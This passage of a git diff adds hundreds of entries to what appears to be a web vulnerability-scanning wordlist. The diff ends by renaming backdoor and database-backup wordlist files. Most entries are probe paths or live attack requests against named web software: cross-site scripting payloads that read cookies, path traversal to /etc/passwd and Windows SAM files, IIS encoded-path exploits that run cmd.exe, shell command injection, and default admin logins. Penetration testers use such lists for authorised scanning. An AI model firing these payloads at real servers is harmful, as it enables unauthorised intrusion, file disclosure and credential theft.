+com/novell/webpublisher/help/en/default.htm
+servlet/AdminServlet
+servlet/gwmonitor
+servlet/PrintServlet
+servlet/SearchServlet
+servlet/ServletManager
+servlet/sq1cdsn
+servlet/sqlcdsn
+servlet/webacc
+servlet/webpub
+WebSphereSamples
+cgi-bin/cgi-test.exe
+doc/domguide.nsf
+doc/dspug.nsf
+doc/help4.nsf
+doc/helpadmin.nsf
+doc/helplt4.nsf
+doc/internet.nsf
+doc/javapg.nsf
+doc/lccon.nsf
+doc/migrate.nsf
+doc/npn_admn.nsf
+doc/npn_rn.nsf
+doc/readmec.nsf
+doc/readmes.nsf
+doc/smhelp.nsf
+doc/srvinst.nsf
+domguide.nsf
+dspug.nsf
+help/domguide.nsf
+help/dspug.nsf
+help/help4.nsf
+help/helpadmin.nsf
+help/helplt4.nsf
+help/internet.nsf
+help/javapg.nsf
+help/lccon.nsf
+help/migrate.nsf
+help/npn_admn.nsf
+help/npn_rn.nsf
+help/readmec.nsf
+help/readmes.nsf
+help/smhelp.nsf
+help/srvinst.nsf
+help4.nsf
+helpadmin.nsf
+helplt4.nsf
+internet.nsf
+javapg.nsf
+lccon.nsf
+migrate.nsf
+npn_admn.nsf
+npn_rn.nsf
+readmec.nsf
+readmes.nsf
+smhelp.nsf
+srvinst.nsf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
+netbasic/websinfo.bas
+perl/env.pl
+perl/samples/env.pl
+perl/samples/lancgi.pl
+perl/samples/ndslogin.pl
+perl/samples/volscgi.pl
+se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
+index.html.ca
+index.html.cz.iso8859-2
+index.html.de
+index.html.dk
+index.html.ee
+index.html.el
+index.html.en
+index.html.es
+index.html.et
+index.html.fr
+index.html.he.iso8859-8
+index.html.hr.iso8859-2
+index.html.it
+index.html.ja.iso2022-jp
+index.html.kr.iso2022-kr
+index.html.ltz.utf8
+index.html.lu.utf8
+index.html.nl
+index.html.nn
+index.html.no
+index.html.po.iso8859-2
+index.html.pt
+index.html.pt-br
+index.html.ru.cp-1251
+index.html.ru.cp866
+index.html.ru.iso-ru
+index.html.ru.koi8-r
+index.html.ru.utf8
+index.html.se
+index.html.tw
+index.html.tw.Big5
+index.html.var
+test
+iissamples/issamples/codebrws.asp
+iissamples/issamples/ixqlang.htm
+iissamples/issamples/Winmsdp.exe
+iissamples/sdk/asp/docs/codebrw2.asp
+iissamples/sdk/asp/docs/codebrws.asp
+iissamples/sdk/asp/docs/Winmsdp.exe
+mc-icons/
+ns-icons/
+cgi-bin/printenv
+cgi-bin/test-cgi
+pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
+test.php
+test/info.php
+info.php
+test/phpinfo.php
+NetDetector/middle_help_intro.htm
+a/
+basilix/
+bottom.html
+interchange/
+sca/menu.jsp
+icons/
+manual/images/
+doc/packages/
+image/
+javax
+perl/
+scripts
+SUNWmc/htdocs/en_US/
+search/inc/
+images/
+docs/
+style/
+styles/
+forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
+search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
+uploader.php
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+iissamples/exair/howitworks/Winmsdp.exe
+%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+conspass.chl+
+consport.chl+
+general.chl+
+srvstatus.chl+
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
+firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
+antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
+antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
+theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
+theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
+theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
+search.asp?Search=
+forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+NULL.printer
+nul..cfm
+nul..dbm
+nul.cfm
+nul.dbm
+cgi-bin/imagemap
+cgi-bin/imagemap.exe
+cgi-bin/htimage.exe/path/filename?2,2
+cgi-bin/htimage.exe
+mlog.html
+mlog.phtml
+mylog.html?screen=/etc/passwd
+mylog.phtml?screen=/etc/passwd
+php/mlog.html
+php/mlog.phtml
+php/mylog.html?screen=/etc/passwd
+php/mylog.phtml?screen=/etc/passwd
+i?/etc/passwd
+cfide/administrator/index.cfm
+CFIDE/administrator/index.cfm
+directory.php?dir=%3Bcat%20/etc/passwd
+content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
+content/base/build/explorer/none.php?/etc/passwd
+soapConfig.xml
+cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+GW5/GWWEB.EXE?HELP=bad-request
+GWWEB.EXE?HELP=bad-request
+cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
+cgi-bin/GWWEB.EXE?HELP=bad-request
+examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
+XSQLConfig.xml
+sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
+docs/<script>alert('Vulnerable');</script>
+docs/NED?action=retrieve&location=.
+aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
+lcgi/ndsobj.nlm
+surf/scwebusers
+_vti_bin/fpcount.exe
+_private/form_results.htm
+_private/form_results.html
+_private/form_results.txt
+scripts/tools/getdrvrs.exe
+cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
+cgi-bin/vote.cgi
+cgi-bin/quizme.cgi
+shop/normal_html.cgi?file=../../../../../../etc/issue%00
+shop/normal_html.cgi?file=;cat%20/etc/passwd|
+shop/normal_html.cgi?file=|cat%20/etc/passwd|
+shop/member_html.cgi?file=;cat%20/etc/passwd|
+shop/member_html.cgi?file=|cat%20/etc/passwd|
+cgi-bin/sendform.cgi
+boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
+proxy/ssllogin?user=administrator&password=administrator
+proxy/ssllogin?user=administrator&password=operator
+proxy/ssllogin?user=administrator&password=user
+cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+project/index.php?m=projects&user_cookie=1
+webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
+webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
+active.log
+?pattern=/etc/*&sort=name
+images/?pattern=/etc/*&sort=name
+debug/dbg?host==<script>alert('Vulnerable');</script>
+debug/echo?name=<script>alert('Vulnerable');</script>
+debug/errorInfo?title===<script>alert('Vulnerable');</script>
+debug/showproc?proc===<script>alert('Vulnerable');</script>
+site/eg/source.asp
+PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
+~nobody/etc/passwd
+admin/db.php
+admin/db.php?dump_sql=1
+dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+iissamples/exair/search/advsearch.asp
+isqlplus
+data/member_log.txt
+data/userlog/log.txt
+userlog.php
+internal.sws?../../../../../../../../winnt/win.ini
+internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
+ASP/cart/database/metacart.mdb
+database/metacart.mdb
+mcartfree/database/metacart.mdb
+metacart/database/metacart.mdb
+shop/database/metacart.mdb
+shoponline/fpdb/shop.mdb
+shopping/database/metacart.mdb
+search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+admin/phpinfo.php
+start.php?config=alper.inc.php
+login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
+viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
+cgi-bin/gettransbitmap
+cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
+JUNK(5).xml
+JUNK(5)/
+cgi-bin/main_menu.pl
+ban.bak
+ban.dat
+ban.log
+banmat.pwd
+admin/adminproc.asp
+admin/datasource.asp
+utils/sprc.asp
+reports/temp/
+cgi-bin/rtm.log
+cgi-bin/VsSetCookie.exe?
+addressbook.php?\"><script>alert(Vulnerable)</script><!--
+options.php?optpage=<script>alert('Vulnerable!')</script>
+search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
+help.php?chapter=<script>alert('Vulnerable')</script>
+src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
+cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/Webnews.exe
+cgi-bin/webnews.pl
+.../.../.../
+cgi-bin/texis.exe/junk
+cgi-bin/texis/junk
+texis.exe/?-dump
+texis.exe/?-version
+cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
+acart2_0/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
+cgi-bin/sensepost.exe?/c+dir
+certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
+msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
+_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+acart2_0/acart2_0.mdb
+acart2_0/admin/category.asp
+Sites/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Push/ViewCode.asp
+Sites/Samples/Knowledge/Search/ViewCode.asp
+SiteServer/Publishing/ViewCode.asp
+siteserver/publishing/viewcode.asp?source=/default.asp
+shoutbox.php?conf=../../../../../../../etc/passwd
+securelogin/1,2345,A,00.html
+.%252e/.%252e/.%252e/winnt/boot.ini
+add.php
+class/mysql.class
+inc/sendmail.inc
+admin/system.php3?cmd=cat%20/etc/passwd
+admin/system.php3?cmd=dir%20c:\
+admin/exec.php3?cmd=cat%20/etc/passwd
+admin/exec.php3?cmd=dir%20c:\
+foo.php3
+config.inc
+sysuser/docmgr/ieedit.stm?url=../
+sysuser/docmgr/iecreate.stm?template=../
+wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
+sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
+cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
+cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
+syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
+syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
+syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
+netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
+netutils/findata.stm?host=<script>alert(document.cookie)</script>
+netutils/findata.stm?user=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
+isapi/tstisapi.dll
+cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
+cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+catinfo
+soap/servlet/soaprouter
+opendir.php?/etc/passwd
+opendir.php?requesturl=/etc/passwd
+webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+JUNK(223)<font%20size=50>DEFACED<!--//--
+MWS/HandleSearch.html?searchTarget=test&B1=Submit
+cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
+certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
+_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+server-info
+cgi-bin/namazu.cgi
+oekaki/
+.nsconfig
+cgi-bin/.nsconfig
+?D=A
+?N=D
+?S=A
+?M=A
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
+dc/auth_data/auth_user_file.txt
+dc/orders/orders.txt
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+cgi-bin/shop.pl/page=;cat%20shop.pl|
+cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
+cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
+JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
+cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
+cgi-bin/ion-p?page=../../../../../etc/passwd
+..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
+..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
+applist.asp
+launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+cgi-bin/index.pl
+cgi-bin/rwcgi60
+cgi-bin/rwcgi60/showenv
+cgi-bin/classifieds/classifieds.cgi
+cgi-bin/calendar/index.cgi
+stronghold-info
+stronghold-status
+blah-whatever.jsp
+gallery/index.php?include=../../../../../../../../../etc/passwd
+modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
+cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+phprocketaddin/?page=../../../../../../../../../../etc/passwd
+cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
+iissamples/exair/howitworks/Code.asp
+iissamples/exair/howitworks/Codebrw1.asp
+msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
+pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
+pls/help/<script>alert('Vulnerable')</script>
+demo/ojspext/events/globals.jsa
+globals.jsa
+pls/sample/admin_/help/..%255cplsql.conf
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
+..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
+..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
+?\"><script>alert('Vulnerable');</script>
+JUNK(10)abcd.html
+iissamples/exair/howitworks/codebrws.asp
+servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
+servlet/com.newatlanta.servletexec.JSP10Servlet/
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+pass_done.php
+admin/admin.php?adminpy=1
+iishelp/iis/htm/tutorial/redirect.asp
+Citrix/PNAgent/
+Citrix/ICAWEB/
+IBMWebAS/
+IBMWebAS/docs/
+IBMWebAS/apidocs/
+IBMWebAS/configDocs/
+IBMWebAS/mbeanDocs/
+iishelp/iis/misc/default.asp
+Citrix/MetaFrameXP/default/login.asp
+manager/html-manager-howto.html
+manager/manager-howto.html
+includes/adovbs.inc
+adovbs.inc
+fcgi-bin/echo
+fcgi-bin/echo2
+pls/ldc/admin_/
+demo/basic/simple/viewsrc/welcomeuser.jsp.txt
+README
+demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
+soapdocs/webapps/soap/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
+phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
+phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
+j2ee/
+cgi-bin/printenv.tmp
+perl/printenv
+perl-status
+WebCacheDemo.html
+webcache/
+webcache/webcache.xml
+bmp/
+bmp/global-web-application.xml
+bmp/JSPClient.java
+bmp/mime.types
+bmp/README.txt
+bmp/sqljdemo.jsp
+bmp/setconn.jsp
+ptg_upgrade_pkg.log
+OA_HTML/oam/weboam.log
+webapp/admin/_pages/_bc4jadmin/
+_pages/_webapp/_admin/_showpooldetails.java
+_pages/_webapp/_admin/_showjavartdetails.java
+_pages/_demo/
+_pages/_webapp/_jsp/
+_pages/_demo/_sql/
+/OA_HTML/_pages/
+OA_HTML/webtools/doc/index.html
+reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
+apex/
+OA_JAVA/
+OA_HTML/
+aplogon.html
+appdet.html
+servlets/weboam/oam/oamLogin
+OA_HTML/PTB/mwa_readme.htm
+reports/rwservlet
+reports/rwservlet/showenv
+reports/rwservlet/showmap
+reports/rwservlet/showjobs
+reports/rwservlet/getjobid7?server=myrep
+reports/rwservlet/getjobid4?server=myrep
+reports/rwservlet/showmap?server=myserver
+pls/portal/owa_util.cellsprint?p_theQuery=select
+pls/portal/owa_util.listprint?p_theQuery=select
+pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
+pls/portal/owa_util.showsource?cname=owa_util
+pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
+pls/portal/owa_util.signature
+pls/portal/HTP.PRINT
+pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
+pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
+pls/portal/PORTAL.wwv_form.genpopuplist
+pls/portal/PORTAL.wwv_ui_lovf.show
+pls/portal/PORTAL.wwa_app_module.link
+pls/portal/PORTAL.wwv_dynxml_generator.show
+pls/portal/PORTAL.home
+pls/portal/PORTAL.wwv_setting.render_css
+pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
+pls/portal/SELECT
+pls/portal/null
+OA_MEDIA/
+OA_HTML/META-INF/
+OA_HTML/jsp/por/services/login.jsp
+OA_HTML/PTB/ICXINDEXBASECASE.htm
+OA_HTML/PTB/ECXOTAPing.htm
+OA_HTML/PTB/xml_sample1.htm
+OA_HTML/jsp/wf/WFReassign.jsp
+OA_JAVA/Oracle/
+OA_JAVA/servlet.zip
+OA_JAVA/oracle/forms/registry/Registry.dat
+OA_HTML/oam/
+OA_HTML/jsp/
+OA_HTML/jsp/fnd/fndversion.jsp
+OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
+OA_HTML/jsp/fnd/fndhelputil.jsp
+install/install.php
+_vti_bin/shtml.dll/_vti_rpc
+cehttp/trace
+cehttp/property/
+webdav/index.html
+hp-ux/
+hp_docs/
+hp_docs/cgi-bin/index.cgi
+hp_docs/xmltools/
+cgi-bin/showuser.cgi
+cgi-bin/man2html
+status?full=true
+rpc.php?q="><script>alert(document.cookie)</script>
+db.php?q='&t='
+rpc.php?q='&t='
diff --git a/Discovery/Web_Content/ASP_CommonBackdoors.fuzz.txt b/Discovery/Web_Content/CommonBackdoors-ASP.fuzz.txt
similarity index 100%
rename from Discovery/Web_Content/ASP_CommonBackdoors.fuzz.txt
rename to Discovery/Web_Content/CommonBackdoors-ASP.fuzz.txt
diff --git a/Discovery/Web_Content/JSP_CommonBackdoors.fuzz.txt b/Discovery/Web_Content/CommonBackdoors-JSP.fuzz.txt
similarity index 100%
rename from Discovery/Web_Content/JSP_CommonBackdoors.fuzz.txt
rename to Discovery/Web_Content/CommonBackdoors-JSP.fuzz.txt
diff --git a/Discovery/Web_Content/PHP_CommonBackdoors.fuzz.txt b/Discovery/Web_Content/CommonBackdoors-PHP.fuzz.txt
similarity index 100%
rename from Discovery/Web_Content/PHP_CommonBackdoors.fuzz.txt
rename to Discovery/Web_Content/CommonBackdoors-PHP.fuzz.txt
diff --git a/Discovery/Web_Content/PL_CommonBackdoors.fuzz.txt b/Discovery/Web_Content/CommonBackdoors-PL.fuzz.txt
similarity index 100%
rename from Discovery/Web_Content/PL_CommonBackdoors.fuzz.txt
rename to Discovery/Web_Content/CommonBackdoors-PL.fuzz.txt
diff --git a/Discovery/Web_Content/db_backups.txt b/Discovery/Web_Content/Common_DB_Backups.txt
similarity index 100%
rename from Discovery/Web_Content/db_backups.txt
rename to Discovery/Web_Content/Common_DB_Backups.txt
diff --git a/Discovery/Web_Content/Top10-RobotsDisallowed.txt b/Discovery/Web_Content/RobotsDisallowed-Top10.txt
similarity index 100%
rename from Discovery/Web_Content/Top10-RobotsDisallowed.txt
